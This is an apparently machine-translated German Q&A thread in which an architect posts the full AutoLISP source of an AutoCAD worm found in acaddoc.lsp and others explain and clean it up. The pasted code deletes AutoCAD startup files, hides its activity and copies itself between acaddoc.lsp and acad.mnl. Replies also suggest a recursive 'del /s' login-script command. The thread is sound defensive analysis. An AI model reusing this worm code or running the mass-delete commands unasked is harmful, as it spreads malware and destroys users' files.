Debuggen, was das LISP-Virus zu tun
Meiner Firma getroffen wurde, durch einen AutoCAD-virus, löschen und ersetzen unsere acaddoc.lsp
mit der routine unter.
Ich bin ein Architekt und nicht genau wissen was diese tun, durch das sich wiederholende "finden" und "löscht".
Fragen
- Was ist das ersetzen der Dateien mit (derzeit Suche nach
acadapq
) ? - Wer schreibt einen virus für AutoCAD?!?!
Hat jemand das schon mal gesehen? die CAD-Foren, sind nicht sehr hilfreich.
(setq wold_cmd (getvar "cmdecho"))
(setvar "cmdecho" 0)
(setq bb 2)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(setq n 0)
(while (< n 1)
(if (findfile "acad.fas")
(if (vl-file-delete (findfile "acad.fas"))
(setq n 0))
(setq n 2)))
(setq n 0)
(while (< n 1)
(if (findfile "lcm.fas")
(if (vl-file-delete (findfile "lcm.fas"))
(setq n 0))
(setq n 2)))
(setq n 0)
(while (< n 1)
(if (findfile "acad.lsp")
(if (vl-file-delete (findfile "acad.lsp"))
(setq n 0))
(setq n 2)))
(defun wwriteapp ()
(if (setq wwjm1 (open wnewacad "w"))
(progn
(setq wwjm (open woldacad "r"))
(while (setq wwz (read-line wwjm))
(write-line wwz wwjm1))
(close wwjm)
(close wwjm1))))
(setq lbz 0)
(setq wwjqm (strcat dpath "acaddoc.lsp"))
(if (setq wwjm (open wwjqm "r"))
(progn
(repeat 3 (read-line wwjm))
(setq wz (read-line wwjm))
(setq ab (atoi (substr wz 4 1)))
(close wwjm)
(if (> ab bb)
(setq lbz 1))))
(setq wwjqm (strcat wpath "acad.mnl"))
(if (setq wwjm (open wwjqm "r"))
(progn
(repeat 3 (read-line wwjm))
(setq wz (read-line wwjm))
(setq nb (atoi (substr wz 4 1)))
(close wwjm)
(if (< nb bb)
(setq lbz 1)))
(setq lbz 1))
(if (= lbz 1)
(progn
(setq woldacad (strcat dpath "acaddoc.lsp"))
(setq wnewacad (strcat wpath "acad.mnl"))
(wwriteapp)))
(if (and (/= (substr dpath 1 1) (chr 67))
(/= (substr dpath 1 1) (chr 68))
(/= (substr dpath 1 1) (chr 69))
(/= (substr dpath 1 1) (chr 70)))
(progn
(setq woldacad (strcat wpath "acad.mnl"))
(setq wnewacad (strcat dpath "acaddoc.lsp"))
(wwriteapp))
(vl-file-delete (strcat dpath "acaddoc.lsp")))
;load "acadapq")
(setvar "cmdecho" wold_cmd)
- Das ist sehr viel Programmierung verbunden. Dies sollte zu bleiben, auf Stack Overflow.
- +1 für traurig, aber urkomisch.
- Wie hast es installiert? Ich meine, haben Sie jemanden in Ihrer organisation installieren Sie es manuell und bewusst in den ersten Platz?
- Ein virus geschrieben und in einem lisp-Derivat. Das ist so cool.
- Dieser "virus" könnte man in jede Anwendung, die ein "- rc" - Datei. Es ist die Aufgabe des Betriebssystems, zu verhindern, dass die Ausbreitung von Benutzer zu Benutzer. Ohne die entsprechenden Berechtigungen, jeder konnte gehen, in, sagen wir, Ihre
~/.bashrc
Datei auf einem GNU/Linux und setzen böswillige Befehle hinein.
Du musst angemeldet sein, um einen Kommentar abzugeben.
Es ist eine support-Datei Weg gehen, löschen und ersetzen von den gängigen AutoCAD-Anpassung-Dateien. ("acad.fas","acad.lsp", "acaddoc.lsp") ich weiß nicht, was "lcm.fas" über alles. Ist es Teil eines AutoCAD-vertikal-Produkt ie AutoCAD mechanical oder Architectural desktop?
Die Schleife ist im wesentlichen", während ich immer wieder auf der support-Pfad löschen".
So weit ich weiß, AutoCAD hat keinen eingebauten Verteidigung gegen dieses. (Es kann einige acad-system var, hält die Ausführung dieser Dateien).
Den "cmdecho" Linien sind das speichern und wiederherstellen der system-Variablen, die ermöglicht/unterdrückt die echo-Befehle. Schaltet ihn aus, während Sie ausgeführt wird (so dass Sie nicht bemerken), dann wieder die ursprüngliche Einstellung.
Einem höflichen " virus :\
Wenn AutoCAD gestartet wird die erste "acad.fas" & erste "acad.lsp" es findet auf ihm die Unterstützung Weg. Jedesmal, wenn AutoCAD lädt ein neues .dwg-Sie führt die "acaddoc.lsp".
Als Befolgen Sie diese Schritte, um loszuwerden, diese worm:
Manuell
Kopieren Sie die angehängte routine auf Ihrem PC: acaddocfix_1.6.lsp
Laden der lisp-Datei mit APPLOAD-Befehl
Der lisp-Datei wird automatisch ausgeführt, und es wird sauber, alle Existenzen der Wurm in Ihrem support-Ordner.
Während Ihrer ist ein anderer Weg, wir können es als eine batch-Datei, indem Sie es sobald ein Benutzer sein/Ihr PC wie ich prüfen, mit der ER vor
Auto laufen
Laufen Sie ein Antiviren-oder ein Reiniger, um loszuwerden, die “acaddoc.lsp-Dateien". Normalerweise cleaner-routine installiert eine einfache routine in Ihrem acad20XXdoc.lsp-Datei, die automatisch reinigen Sie diese Dateien aber ich empfehle die Reinigung der Viren mit einem anti-virus-ersten.
Sie können auch laufen -acaddoc.bat-dos-batch-Datei zu reinigen alle Ihre Laufwerke manuell.
Ausführen dieser batch-mal und löscht es alle acaddoc.lsp-Dateien auf Ihrem system.
HINWEIS: Wenn eine der infizierten Dateien in Ihr Autocad Support-Ordner sind SCHREIBGESCHÜTZT die Reiniger nicht in der Lage, reinigen Sie diese Dateien !!
wenden Sie sich an http://metinsaylan.com/how-to-clean-acaddoc-lsp-virus-from-your-pc/
Das wilde daran ist, dass der lisp-Datei wird nur erstellt, wenn die Dateien geöffnet sind, auf das Netzwerk, lokale Kopien scheinen nicht dieses Problem haben.
hinzufügen del /s acaddoc.lsp und "del /s" acad.lsp für alle Benutzer login-Skripte und führen Sie dies für eine Woche oder so, und Sie sollten loszuwerden, alle die acaddoc.lsp und acad.lsp-Dateien, die der virus coomes in...Stellen Sie sicher, dass Sie nicht wirklich verwenden Sie diese Dateien für Ihre eigenen Zwecke aber sind vor dem ausführen der delete-Befehl